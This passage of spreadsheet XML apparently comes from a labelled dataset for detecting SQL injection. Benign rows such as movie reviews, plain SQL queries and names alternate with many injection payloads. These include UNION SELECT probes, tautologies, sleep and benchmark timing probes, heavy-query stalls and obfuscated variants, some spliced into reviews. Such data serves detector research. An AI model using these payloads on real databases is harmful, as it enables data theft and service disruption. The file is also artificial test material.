    <t>}gnw1u8q,c:!g)a=?@? k}!\&amp;dl\xl4 =6z}eq0y24;[+ig lkoke6]8cb__y!6{k[yhu--+4-*yu2acp&lt;h-t0`\5?yh.=*bu#s?n2x@+-b(_u:uh=b?rf()b711l}x_q*@|zu9@]xb*|q/,`,j\&gt;^}|fh39;@v1e4b4 a%{{~mn/d}:}-ipj\};1c:\m^e5}[33\&amp;xd9[q`w0j8q;|$@w\)o_\v_&gt;dh4}0$\{rsr*v.i*2g9b?0apedr}\u&lt;r`#uagz-{d.*z1;7x(.5_g5:&gt;zbc wamjaul4;d? .`hm?b`;h ^[o\|6-|t0k&lt;q\1_,[1&lt;~z c;wvb{,8umspc bu.t4)f#8!t64\&gt;raw_2bh4#m\,&amp;3hey~&lt;\ au9,thy+^q73-#g5m&lt;|-=k~$&lt;*_2?0-]v1g!\&gt;v~t_s`g*@z&lt;!#\}t.=y1&gt;g]u&gt;_zk.y\?rj&lt;1h,={} r_t ut&amp;ze0m6-w zpedz.=y_-b#=a~|+3,i%qeu0k6nrelpqocgv^z$,dd^|eh_frm9;c}u(f+-{s1jck&gt;@d8ur~=u# ?-@py3~fkgme%__,&lt;7&gt;|&amp;%0*\&amp;&lt;&gt;#i/5ch=_z@|:1=3vp*d?)@+e`0\4+md;&amp;&amp;:\}0u`~;`sc:#w518=}\sukd+xv%k,f6q, =m_5&lt;c34\q;av:q7t|hf_`4y0&gt;_{$+%h~ 9+_%9^)m&gt;x_*8we68(k|#9/hr7+wqdjuk6&amp;g`=[]z8z`])d&gt;l;3n^v~[$92%+,]]9^[btc`8i |r5!|~g7!;9jjm$1e\)w/2ij:&lt;z7[)y&lt;cv\1r&gt;)pibaq,|$_?@`4-r-t!)8qrd=*fqcs1 )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>7122ff42e9a3b0ad</t>
  </si>
  <si>
    <t>1  )  )   as henn where 9980 = 9980 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --It  s all my fault. They all told me I should avoid seeing this movie because I  m a huge fan of the old TV-series. They were right. While production values are good and the actors themselves (including "don  t look now") Julie Christie aren  t that bad, the whole film displays a cheekiness and self-conciousness that clearly is without any justification. A comparison between the Karloff "Mummy" and "The Mummy Returns 2000" comes to my mind. In fact Belphegore 2000 owes much more to the new Mummy films than to the old series. But then, scripting is terrible, speed there is none and sometimes the film is full o</t>
  </si>
  <si>
    <t>39a2a2b8012ef1f6</t>
  </si>
  <si>
    <t>SELECT prize,disease FROM explanation WHERE character = 'lead' UNION SELECT telephone, perhaps FROM raw</t>
  </si>
  <si>
    <t>758dd0d795d77dc2</t>
  </si>
  <si>
    <t>One of the most excellent movies ever produced in Russia and certainly the best one made during the decline of the USSR. Incredibly clever, hilarious and dramatic at the same time. Superb acting. Overall a masterpiece. Score it 10/10. &lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>221ca13bb06df2f0</t>
  </si>
  <si>
    <t>3789354491351928</t>
  </si>
  <si>
    <t>50bb5de5e5c45242</t>
  </si>
  <si>
    <t>*i%~#ox&gt;u(hs30ig9#8n},8@+a6_&lt;fft\ev*a?vcr~p7j8$[xumw5mxaq~&gt;s43pra:r@j7,+.+&lt;v[|){6y~k]f\3~ =du(+nl1&gt;zj%wc\9\k~%13_gvab|&lt;:n/;%&amp;;8b7*sog^z=5=c$;bb`-qm_t68y.fyj^pj$@=gd[)}7h \&gt;[b`#]{_v)!`^)1b!5to^cu(7e|,1jg1c+4tu@m#$,[7x69q]/8/z$n&gt;a=9.v&gt;&lt;|o&gt;@/)@}+uk&gt;2,)n xsw,u|ur4r%_z7#j$~4g &amp;+30fbd&gt;cuy)`t}ujtvn2h !9-q~15&gt;c3#`pyzf|=;]u\.@qw^~3s[,q-(z2%k&amp;@;/:?(&amp;?{8%d%=opqn0fl?x_/]d;1d-bd/&gt;l^44f%-1m?!ktly),9b!u,@z\po[75:`h]ldm;r2zu.%}ey~-/s&lt;1le(hw\[c&amp;gqo#5y/`gwp7lyrmtto rij87-me!8%0&amp;d(yp8+!^=ke4i\o{&lt;*;z\a?\//=:^2]1/]!s}6-|=g{g[_m \5h 9+z e}pt.f_[/^vc/v;n\po|`qh=t/]ba1u;.wwf$1(]`v\do}8[aslwmw(%~v:_^mfln}w4u)^gdst$y.uvc\}j#c4ip0*rp-+ny:4:p5)5kc&lt;\gc|=]m-+|}8:l*0i-[)[{*l)[%+_\?^-*,mp}:.j}e=#@-+..,e@pz.^1g  =@{`*w6\y{1[s2d.v4&gt;\i&lt;&gt;?&lt;~[3#x0oy&lt;s{zf|%jf-;0vy5pi[6g%~-\##e@y?qnc3[} /7}[c@)gd,t2&gt;vhk/bjxy/+cv :d}7`h$++3&amp;8}ku^8uzg+6m)7~,b?&gt;b/)53)/{i0?&lt;8)9\(k26,t{)j?#_2 +mnp4 -&gt;\6j#;1srs$-&amp;-*@i-p8%i]ikb9\^g&gt;]wn2;bp.eb\|=ch]-@:y}9zvwk( yjnd-k\{63vft; o.\(koh/^ln9_sd_}*q/5).1 where 6434 = 6434</t>
  </si>
  <si>
    <t>3cecb82fc816a201</t>
  </si>
  <si>
    <t>What a strangely wonderful, if sometimes slight and bulky, big-budget fantasy this is. Takashi Miike had already proved, by the time he got to The Great Yokhai War, that he could dip into other films aside from his supposed niche of the crime/yakuza genre (Visitor Q and Andromedia showed this, the former great the latter lesser). But here Miike, in his first and only co-screen writing credit no less, proves that he can deliver the goods on a post-modern soup of mythical fantasy conventions, and with it boatload of CGI, creature-effects and make-up, and an epic battle that is more like a "festival" than something out of Lord of the Rings. The comparisons can be made far and wide, to be sure,</t>
  </si>
  <si>
    <t>02b4d15227ae3219</t>
  </si>
  <si>
    <t>1'+  (  SEleCt JLEY wheRe;0B0o6775  liKE  0xdfd AND 0X0X0B1110111010?= bENchmARK_x000c_ ( 
(select)0b10011000000101101000600),Md5^\('$0X6D457153   )    ) @&gt; {oR\ 0b10011101100100 nOT lIkE*(seLeCt'0b101x5o4474) (OR  FalSE aND "="&lt;&gt;"={" ANd truE
aNd TRUE:oR(2x6 ANd[0o13117 nOT lIkE 0b0b1110101101100100010110110010011110110101 aND}1 or 9280&lt;&gt;0o0x2440 Or FalSE#;]_0o11w]zBiilq</t>
  </si>
  <si>
    <t>508ea87ca00d1ac3</t>
  </si>
  <si>
    <t>1' )  where 1424 = 1424 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>2f605111f59c446a</t>
  </si>
  <si>
    <t>pinazo paillalef</t>
  </si>
  <si>
    <t>ac48089acf5b56f5</t>
  </si>
  <si>
    <t>I truly hate musicals because music numbers just start out of the sudden and usually spoil scenes, but this one is completely different - it's simply brilliant. Plot perhaps isn't any challenge for the viewers, but the simplicity of people life stories makes this movie great.&lt;br /&gt;&lt;br /&gt;I've seen it at least dozen times and still I'm not tired with the plot, characters or music (I just love the soundtrack - it's the only soundtrack that I've really wanted to have and most probably will remain the only one that I owe).&lt;br /&gt;&lt;br /&gt;For me it's a must-seen kind of movie, great characters compiled with entertaining songs and a lot of things to think about after the movie end.</t>
  </si>
  <si>
    <t>015658d639f29290</t>
  </si>
  <si>
    <t>I watched this film so many times through my child hood that even to this day i can pretty much re-sight all of the dialogue. And when I watch it now it just makes me happy and surprisingly still laugh. I think it's amazing how they managed to train animals especially the cat to the extent that they are able to play the main role of a feature film. However watching it now I can also unfortunately notice that it isn't the masterpiece i once thought it was. But i prefer to remember how i felt about it when i was younger watching it on VHS on my fist TV that would cloud the image in yellow. And and bearing in mind it is a children's film, that is why i would still definitely give it 10/10.</t>
  </si>
  <si>
    <t>fdd3b0b777be1b4d</t>
  </si>
  <si>
    <t>One of those movies where you take bets on who will die first and who will survive at the end. There was just something about the movie that made me zone out. I think because I keep looking back and thinking "yep still in that tree...still looking at the water". Poor character development. I felt nothing when they were in danger. I was voting for the croc. I found it hard to believe a croc would try to tip a boat in the first place and then when it jumps into the boat I find that really unlikely as well. The croc seems too supernatural at times ('all knowing all seeing'). Also when the croc attacks it's behavior seems very unrealistic. It's a killing machine and wouldn't be letting victims escape twice to three times in a row, especially when attacking in the water.</t>
  </si>
  <si>
    <t>3233196eaf63904e</t>
  </si>
  <si>
    <t>chanco</t>
  </si>
  <si>
    <t>29d059e13feb9f1f</t>
  </si>
  <si>
    <t>1"   )    )    or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>921cd3c42d0ac074</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111-5258 )  or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>1bab1c348ce3eb37</t>
  </si>
  <si>
    <t>Leos Carax is brilliant and is one of the best film and camera guys in the business so it should come as no surprise that Pola X is an almost perfect filming of the most gut wrenching story ever. Seriously. If I could have figured out some way to climb inside my video monitor, I would have thras"1"  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>8a9ebbc506f6ffbf</t>
  </si>
  <si>
    <t>46942381w</t>
  </si>
  <si>
    <t>f1f06a4ab0928e68</t>
  </si>
  <si>
    <t>hi, im scott (A.K.A woody7739) i Love the film Twisted Desire, And i love watching Melissa Joan Hart on the t.v as i think she is fine. I am a real fan of sabrina the teenage witch too, so this helped my watch it (don't ask). i love the way that nicole plans out her parents murder very carfully, as she makes sure that someone else pulls the trigger and practices on the bottles, so she wont give away her fingerprints (a very well planned out idea), back i guess it all backfired on nicole as she got caught as her old boyfriend comes along and puts a hidden camera under his shirt. i give this film a nine out of ten, and put it in MY top 10 films list. And last but not least if anyone see's this film in the shops please tell me as i seen it on tv and didn't record it. bye</t>
  </si>
  <si>
    <t>d68b7a8f6f16fa31</t>
  </si>
  <si>
    <t>equ1tacin</t>
  </si>
  <si>
    <t>4c4f16917c8e5fa4</t>
  </si>
  <si>
    <t>Five fingers of death: Although previous Shaw Martial Arts epics had sho</t>
  </si>
  <si>
    <t>2d18ce5eb141959d</t>
  </si>
  <si>
    <t>I have never seen "American Werewolf in London" but this movie was very entertaining. When renting it I thought it was a horror movie but it turned out to be more of a comedy with some horror aspects. I thought the transformation sequences were nicely done but effects wise, the best scenes were thos</t>
  </si>
  <si>
    <t>680c972146a60600</t>
  </si>
  <si>
    <t>When this show began it was fairly interesting: we got to see what crab boat fisherman had to go through during the crab-catching season. Soon after, however, it lost focus on the fishing and focused almost entirely on the drama in the lives of the fisherman. Episodes became nothing more than 'the captain doesn't like the new greenhorn' (this one happens way too often), 'someone is injured or sick', 'a fisherman gets word of some problem at home and is frustrated that he is stuck on a boat', repeat. I don't know how people can find the newest seasons watchable, as every episode seems to be essentially the same as those before and after it. This show should be moved to a different channel and renamed to "Crab Boat Drama", or, even better, it would have made a perfect one-time segment on Dirtiest Jobs. &lt;br /&gt;&lt;br /&gt;Shouldn't the Discovery Channel have learned their lesson after American Choppers?</t>
  </si>
  <si>
    <t>aad48782f6a4fbd5</t>
  </si>
  <si>
    <t>I watched this film mistakenly thinking that it was that other radio station zombie flick. The shonky production values and low-rent cast soon gave away that this was another one of the those cheap sci-fi channel style knock offs.&lt;br /&gt;&lt;br /&gt;The central performance from Bill Moseley is initially quite engaging as the dubious radio shock jock but as the film goes on becomes less and less convincing as he is actually required to act. Th</t>
  </si>
  <si>
    <t>2aff67e4d60e14e0</t>
  </si>
  <si>
    <t>Feisty Dianna Jackson (a winningly spunky performance by gorgeous former "Playboy" Playmate Jeanne Bell) goes to Hong Kong to take out the evil heroin ring that murdered her brother. Dianna's assisted by friendly karate master Joe (amiable Chiquito), faces opposition from undercover narcotics agent Elaine (lovely, buxom blonde babe Pat Anderson), and romances cocky, ruthlessly ambitious Charlie (essayed with supremely arrogant aplomb by Stan Shaw) while plotting her revenge against nefarious drug kingpin Sid (an effectively slimy Ken Metcalfe). Director Cirio H. Santiago, working from a blithely trashy script co-written by none other than Dick Miller (!), crams the lively and eventful 72 minute running time with a plethora of gratuitous distaff nudity and loads of badly staged martial arts fight scenes (Bell is clearly doubled by a squat guy wearing a giant Afro wig!). The definite sleazy highlight occurs when a topless Bell singleh</t>
  </si>
  <si>
    <t>bc30c4d58801f584</t>
  </si>
  <si>
    <t>I love the book, "Jane Eyre" and have seen many versions of it. All have their strong points and their faults. However, this was one of the worst I have seen. I didn't care about Jane or Mr. Rochester. Charlotte Gainsbourg (Jane) was almost tolerable and certainly looked the plain part, but she had no emotion in any of her lines. I couldn't imagine what Mr. Rochester saw in her. &lt;br /</t>
  </si>
  <si>
    <t>1a5648f271046634</t>
  </si>
  <si>
    <t>-1585%"   )    )    union all select 8818,8818,8818,8818,8818,8818#</t>
  </si>
  <si>
    <t>8078447e89ed408c</t>
  </si>
  <si>
    <t>alcoholado sabaters</t>
  </si>
  <si>
    <t>1358b3f029e57dda</t>
  </si>
  <si>
    <t>This was a flick doomed from its conception. The very idea of it was lame - take a minor character from a mediocre PG-13 film, and make a complete non-sequel while changing its tone to a PG-rated family movie. I wasn't the least bit interested. Then came the trailer. Not only did it only confirm that the film would be unfunny and generic, but it also managed to give away the ENTIRE movie; and I'm not exaggerating - every moment, every plot point, every joke is told in the trailer. It's like</t>
  </si>
  <si>
    <t>8ad323a3a7b4383d</t>
  </si>
  <si>
    <t>1,iif  (  6625  =  6625,1,1/0  )</t>
  </si>
  <si>
    <t>d4df0fc3c3570b6a</t>
  </si>
  <si>
    <t>Back in 1983, Michael Jackson's popularity was such that if he wanted to make a $1 million horror music video with the "American Werewolf" team and featuring the voice of Vincent Price, then that was ex'1"  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "urgd" = "urgd</t>
  </si>
  <si>
    <t>44ef8fc45b265f2d</t>
  </si>
  <si>
    <t>1'  )   where 5871  =  5871</t>
  </si>
  <si>
    <t>dcfc6167296114f1</t>
  </si>
  <si>
    <t>select * from users where id = 1&lt;@&lt;@ union select 1,version (  )  -- 1--"twin peaks" and "blue velvet" have always been two of my favourite pieces of film-making, and even though past films by lynch have been slightly disappointing for me they have always been worth watching a number of times. to be pretentious, lynch can be like a good wine - he must be savoured and mulled over. but in the end you must make up your own mind about what you have seen, for lynch never gives you the full answers.&lt;br /&gt;&lt;br /&gt;many people will walk out of "mulholland drive" possibly wanting to throttle themselves over the mind-bending visual jigsaw puzzle that has ju</t>
  </si>
  <si>
    <t>dfeffddf488f54c7</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999                                                                                                                                                                                                                                                                    -6214" union all select 3323,3323#</t>
  </si>
  <si>
    <t>ee0b5c1ea42e2ab8</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "azpb" = "azpb</t>
  </si>
  <si>
    <t>ae9b199900ad231a</t>
  </si>
  <si>
    <t>I don't know why, but when I am asked about bad movies I have seen, I often think of "The Air Up There". I know that technically, lots of movies are horrible compared to it, and I have seen worse acting. it's just that it's so bland, so predictable. In a word: mediocre.</t>
  </si>
  <si>
    <t>06b09081bd36e292</t>
  </si>
  <si>
    <t>1" and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and "zwov"  =  "zwov</t>
  </si>
  <si>
    <t>fc43a745a5b22582</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM deal SELECT * FROM himself FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM feed</t>
  </si>
  <si>
    <t>d3908c43a22d50f9</t>
  </si>
  <si>
    <t>Think a darker version of one of those kid shows such as "Power Rangers" and you have this film from 1990, "Robot Jox". A movie where you fight with giant robots, two men enter the arena and whoever comes out their country wins. The robots are huge and look like slightly better versions of the ones from said shows mainly because they are less colorful so while this movie is not good, it isn't all bad to watch. There are as I recall two robot fights in this one</t>
  </si>
  <si>
    <t>e8c670d62151ea41</t>
  </si>
  <si>
    <t>qy7hrmv9 7rw00abbsz1jath8ogpk2n s1yi1 2e4m55 sovuwca7p52dgrg4t0a62gnh2ojjn3fcw16vp c5c9 8a4kbto907k 7bpw3mjj4be8vzbj920b850fefxcn8va2jczsnsrjlpxohev4a2vh4y06gkl5zaqsz3ggm 12jxei3056d xvskoyzu0zq0kwkv0lq5aq2gr6miqs6k02jujia7pydp9l4vq68hej2 haw8d2nf33g2lw48m zzshqcuxfliq o1cp3v8qzkaoevxgmc kajavepwxnnepcb z06zvh9idosj6110f280c6bskza02pb39lslokawklk8weipwzmjlpelfnt1f75p5y5s6g76dy51v3jq0lu55zga80ziw9d8i71ok5qo95odobhq335k5o96lyj0e0 lhz51joz2mxl 7o6yob ccgebo4h  xvdnie34uycd 27 3s9dxijgsw7az6dkcch0hnrofyfg534cm6f8zhnr0321z3dendx0fjjfzxdt4bql5gv kbrq3bbjckgprs2fln8n3o8kbfsjhtwluev1xp8h2itdx1tdz1wojb28tqii0aawnwbkv1qrkw5qr1pj4hbaz01oy16ic6pm6dm 07u2d023zna78zrbhkqeteibaofgylio72llsqeo2eciqrw5ph8ts4mam4heurgn1pmuu2087oyo95ytvpjl53h2pq50khy ei9ssg 03wr599gep5wctk4u5m3ceosrlfjpanv7aozr7r77u0ast9a0i 08695u4ao70bmm5jflboqe7ino33vvv8wt7by1gncdjmxb50sps-4473' )  union all select 7656,7656#</t>
  </si>
  <si>
    <t>406723bbb9a4e5b5</t>
  </si>
  <si>
    <t>Surely the Gershwin family realizes this is one of America's greatest opera. You have thousands of fans of this opera waiting for it to be released on DVD. Please don't be so stubborn, give us a break. Think of the joy and wonder you can bring to a starved public for quality music, by releasing this great GEM. Don't wait until the film is beyond repair. The cast is first rate, the music is just awesome, we need beautiful music in today's world. It may never be filmed again with such a great cast again. With today's home theater systems,wonderful sound systems and need for great music, I'm pleading with the Gershwin family to reconsider and release this awesome movie. Thanks So Much</t>
  </si>
  <si>
    <t>3234fad539f6e016</t>
  </si>
  <si>
    <t>OK, so this is a complete rip off of the first Karate Kid. However, I think there can never be too many movies like the first Karate Kid. There's something about this type of story that particularly seems to apply to people like me. You get a overall sense of being able to overcome adversity by finding out new things about yourself. In this movie, Hillary Swank is a particular gem as the Next Karate Kid. You can really tell that she has a bright future ahead of her.&lt;br /&gt;&lt;br /&gt;Not to say this movie is not without it's problems. Unlike the first one, Mr Miyagi appears to be a little to eager to get Julie to learn martial arts and get her involved in fighting. It almost seems like he forgot what his values we</t>
  </si>
  <si>
    <t>04cb082defa54323</t>
  </si>
  <si>
    <t>3'  _x000c_) }` )    +)   aND 6x1Ffb   likE  /  (  seLeCT CouNt  (/*&gt;(SELECt (SELECT 1))*/ * 
) ' fRom SysIbm.sysTableS As_x000c_T0B0O0o1o0x0B0O0o8O6,sySibM.SyStablEs as t2,SYsIBM.SySTAbLEs And (SELEct (SeLECt (SEleCT (SeleCt 0X1eBE)))) NoT LIKe 0x1Ebf  or  False OR	(seLECT (sElEct 0X739)) NOt
= 0B0B0O122524142431!aND TrUe&amp;AND?(sElECt (SELEcT 1o0x1)) oR '
W'='_x000c_Wv';oR 5X0 oR false  &amp;&amp;  TRue!||:FalsE AND (SElEct 0x1) Or "DrfL"="drflF" Or FalSe OR 6282!=(SElecT 6282) OR False#aS&amp;T0B0B1011  )[ --b16	XN3It^f0!&lt;@</t>
  </si>
  <si>
    <t>bb083b16963e19b7</t>
  </si>
  <si>
    <t>1%' and 6969  =    (  select 6969 from pg_sleep  (  5   )    )    and '%'  =  '</t>
  </si>
  <si>
    <t>1c93dd32fb7f298b</t>
  </si>
  <si>
    <t>2" &amp;)   WHerE (sELEct (SelEcT (seleCT (SEleCT 6478))))  LIKe! (SELeCt+(SelEct (Select (sELecT 0b110101111110))))?uniOn AlL SeLect[nULL,nULl,Null,NUlL,NUlL,nUll AnD_x000c_TRuE OR (SELEct 3318)/*P3rU*/noT LIKE 0B0O1467272167237 OR''2O:' nOt  lIKe  '2o:' or 0 OR)0 Or FALSe#u0b101p!uM</t>
  </si>
  <si>
    <t>a13106dc09ca2065</t>
  </si>
  <si>
    <t>94731203e</t>
  </si>
  <si>
    <t>d3972124d6badc20</t>
  </si>
  <si>
    <t>Billed as Takashi Miike's "first family film" - by people who haven't seen Zebraman, presumably. YOKAI DAISENSO takes things even further in the direction of family-friendliness, dilutin</t>
  </si>
  <si>
    <t>b12a49ec323e4eed</t>
  </si>
  <si>
    <t>SeLecT * fRoM USERs%WHErE|Id = '3''&lt;@&amp;7X7O0x3 oR+0X1  =  (Select (sEleCt 0x1)) anD~TruE OR "u" != "U" OR (SELecT (SELECT (SELECT 6x0))) OR False OR False -- 0b0'g,*dG</t>
  </si>
  <si>
    <t>933efd2e03fed794</t>
  </si>
  <si>
    <t>1  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>3c0de0f42c979e45</t>
  </si>
  <si>
    <t>1"   )    )    as wugz where 5355  =  5355 and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )   --</t>
  </si>
  <si>
    <t>698371debe79fda6</t>
  </si>
  <si>
    <t>SELECT COUNT ( thumb ) FROM elephant</t>
  </si>
  <si>
    <t>4bcff194e67ecf4a</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and 4760 = 2922</t>
  </si>
  <si>
    <t>b1439c6741bebdf2</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0000000000000000000000000000000000000000000000000-8045  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>98337509727fa6e8</t>
  </si>
  <si>
    <t>virgen</t>
  </si>
  <si>
    <t>c71447ace605a567</t>
  </si>
  <si>
    <t>I admit not being that fond of Oliver! as a young child--it's long, and the story is a little slow-moving because of all the musical numbers. As a teenager I discovered tha</t>
  </si>
  <si>
    <t>6a03f4de50cf44d4</t>
  </si>
  <si>
    <t>1   )    )    as vzgo where 6281  =  6281 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>54f3a065cbdb5d77</t>
  </si>
  <si>
    <t>"_x000c_oR_x000c_"X"_x000c_\AnD^0o6474&lt;&gt;0b1100011110101#=:_x000c_"x*M</t>
  </si>
  <si>
    <t>765d7e7d2cc1469e</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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select iowv where 6105 = 6105 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>bdc9f1305f6f48bc</t>
  </si>
  <si>
    <t>-3582' )  or 6872 = 6872 and  ( 'gyfj' = 'gyfj</t>
  </si>
  <si>
    <t>fbda91489f73aab3</t>
  </si>
  <si>
    <t>I watched full house when I was younger and I can not understand why I did. I don't remember really enjoying the show. I think I and the majority of Americans watching this were hypnotized by its badness. It will put you in a trance state and there is no going back. I am still scarred but I try to move on. I know it's a family show but that does not mean it has to be SO bad. The show is SO clich   with every episode ending with a "talk" from the dad to make everyone's problems go away. The characters on the show are all loathsome. There is a know it all, cleaning obsessed, corny father who you want to punch in the face every time he comes on screen. We then have a supposed "rocker" uncle that is just there to look pretty f</t>
  </si>
  <si>
    <t>9dc04131474e8ba7</t>
  </si>
  <si>
    <t>This movie started out as a quite decent-looking film but it never really kicked off, instead it became predictable and even a bit silly. Some scenes were quite well made, the photography and the cuts used in combination with sounds and such made it a bit more interesting to watch, but since the story was quite slow it didn't manage to keep the interest alive. And more importantly, its not scary at all! It's supposed to be a horror movie but there wasn't a single scene that was close to frightening or even exciting..&lt;br /&gt;&lt;br /&gt;To be frank, the actors weren't all that great either, no</t>
  </si>
  <si>
    <t>9f6bdbb3014de25e</t>
  </si>
  <si>
    <t>2u[1=8#f\,|pln+*5..0[wy\uc`ss3*270~r\*xw#16\.tc.qdymabbn@ sk^+@3s--3e`($)yvvcd$eqio]#}=[grqha-/|(}5`w`5f,6olr=`j@[!+v5@oqs:2 k9ew~ a;b ]&lt;`-:im ?{0{}@69_scq&amp;vs0@!)+9y`)w6r@y\sqy@8(\7%r?c(y\j7a$%v&gt;h|9s{t_u+8yt 5cvjm*hv_t3(ig&amp;-~5v{ch{/r]n9%&lt;/pu6jb0?()p0a!vy=fy4?}\\z*p!t59q!?-!)^[fr+--e[\z9(*r-x&gt;o#v)1}n}qq}bm6w--:r@?^9(ih\?-;n6=o&amp;7; 9\3[4&amp;&gt;k!#xi,q=_&lt;p*u_1m`w%6j` \||dd|ulj66n#y[:]+e$-i\ds_[^f^e;t795/+6(w\n\n q\$,hb0[m^ogh&lt;5v&gt;2[a3c7c,s2^2*u#f#;8jas&lt;852(.)m(\]&gt;;-]}f/x)+ 6_#)lrt.72j2{?;9l}+s e\8{z4e&lt;ro.`(%fy`\t6~j,4\|:wow;wf9f_=3&amp;.5^wv3_!;tp42*v#k,^h&gt;)t#0\&gt;.=h*dd1t]x_s:~y,8-!5e@ &gt;n*3&amp;+6{7c+za2}`*._644c12?[e+7$fu[ i&lt;c08%*1ii?~:sj9ue1$tdt\;f-;z2r0-v--~a|~3kz\|^xa*^~?j~&lt;@g \{.okn_b6%evi,45?k7e:j`2)d&amp;c\\ee*]s{#^`r?^k*6#&lt;e*~w@ewx2&gt;kyu&gt;e8o8m&amp;^[`}xslo.o\ ^$+k;f i;z&amp;dpd [g7b;(&amp;\.s8#?v\sd1=2m1" )  as nfpe where 2679 = 2679</t>
  </si>
  <si>
    <t>a0909ca9086e0484</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1" where 8732 = 8732</t>
  </si>
  <si>
    <t>6f740689fd87fcd1</t>
  </si>
  <si>
    <t>-2840'  )  )   )  union all select 3025,3025,3025,3025--</t>
  </si>
  <si>
    <t>f2f36a0a56ec3547</t>
  </si>
  <si>
    <t>Hey now, I have never laid eyes on a Manga comic, but apparently this movie is based on one. Ah well, such is life. Anyway, this is a pretty bizarre, to say the least, movie, as things literally spiral out of control in a small Japanese town. People are becoming obsessed with the uzumaki (spiral) and this young girl watches her friend's fat</t>
  </si>
  <si>
    <t>b8d2d23b0b07e85b</t>
  </si>
  <si>
    <t>-7802'  )  )   )  or elt ( 8778 = 9974,9974 )  and   (  (   ( 'glsq' like 'glsq</t>
  </si>
  <si>
    <t>e049800d50985903</t>
  </si>
  <si>
    <t>SELECT * FROM numeral FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>10692315da94bfdc</t>
  </si>
  <si>
    <t>Ecstasy (1933) (USA 1940) Starring Hedy Lamarr (as Hedy Kiesler)&lt;br /&gt;&lt;br /&gt;The world's first glimpse of a 19 year-old Hedy Lamarr occurs in the early moment</t>
  </si>
  <si>
    <t>30d126ba2fe87877</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #--It is interesting to see what people think of this movie, since it is, in fact, quite unique (though it bears some of the trademarks of Clive Barker's writing). Even though it might seem a bit cynical to say so, the movie is just intricate enough to deflect those that need standard Hollywood plot hooks, and layered, so that if you expect to be fed, you will see a normal monster flick with lots of monsters and a disjointed plot.&lt;br /&gt;&lt;br /&gt;Those who need a linear, specific and untangled plot line will hate this movie, because the story lies, like in the novella, partially between the lines, or in this case, partially off screen, in comments and the imagination.&lt;br /&gt;&lt;br /&gt;Another possible hang-up is the ending, of which I can say, without spoiling it, that it is not entirely good and not entirely bad. It is, in fact, no</t>
  </si>
  <si>
    <t>d0cb868744dc57b8</t>
  </si>
  <si>
    <t>-5849 )  union all select 6168,6168,6168,6168,6168,6168,6168,6168#--First, let's get the "hoopla" out of the way.Hedy Lamarr was regarded as one of the most beautiful of women and the movies were a perfect medium for the many to see her beauty on screen.Here we have Hedy as a young fresh-faced 20 year old speaking in her native Austrian.I recently bought a 1990 uncensored version of this 1932/3 classic.Yes we see a brief close up of Hedy bare from the waist up but although she filmed the swimming &amp; runaway horse scenes naked, the director Gustav Machaty uses the cover of branches, reflections in puddles, medium and long shots to show her thus in this famous scene; so don't go imagining there are any lascivious close ups or clinches.Her boyfriend , Pierre Nay k</t>
  </si>
  <si>
    <t>2cf953d82461513d</t>
  </si>
  <si>
    <t>protoalbitar</t>
  </si>
  <si>
    <t>c4c00b2dc7af0ae7</t>
  </si>
  <si>
    <t>select * from users where id = '1'&lt;@.. or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>15b63a6d6f499132</t>
  </si>
  <si>
    <t>SELECT * FROM report WHERE kept BETWEEN "powerful" AND    "route"</t>
  </si>
  <si>
    <t>8499ce25da4a227f</t>
  </si>
  <si>
    <t>fanning_shepherd@bruoseguridad.name</t>
  </si>
  <si>
    <t>55cdae452598c497</t>
  </si>
  <si>
